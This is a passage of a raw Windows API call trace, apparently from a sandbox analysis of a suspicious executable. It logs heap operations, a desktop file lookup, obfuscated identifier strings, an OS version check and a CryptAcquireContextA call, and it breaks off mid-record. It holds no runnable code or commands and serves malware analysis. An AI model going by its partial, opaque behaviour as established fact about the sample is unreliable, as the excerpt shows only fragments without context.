returned 1 [0104.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0104.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0104.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0104.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.127] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0104.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0104.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0104.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0104.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0104.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0104.128] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0104.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0104.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0104.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0104.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0104.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0104.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0104.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.129] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/QgQCsu7ShKSSIL.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 0x9a3bc0 [0104.129] FindClose (in: hFindFile=0x9a3bc0 | out: hFindFile=0x9a3bc0) returned 1 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0104.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.129] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0104.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0104.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.130] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0104.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0104.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0104.131] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.131] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0104.131] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.131] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.131] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0104.131] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0104.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.132] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0104.132] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.132] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0104.132] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0104.132] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.133] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.133] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0104.133] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0104.133] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0104.133] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0104.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0104.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0104.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0104.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0104.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0104.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0104.134] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0104.134] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0104.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.134] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0104.134] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0104.134] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.134] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0104.134] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0104.134] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0104.134] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0104.134] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0104.134] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0104.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0104.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7080, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0104.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0104.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7220, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0104.135] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bf6e8) returned 1 [0104.135] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.135] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0104.136] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0104.136] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0104.136] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0104.136] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, 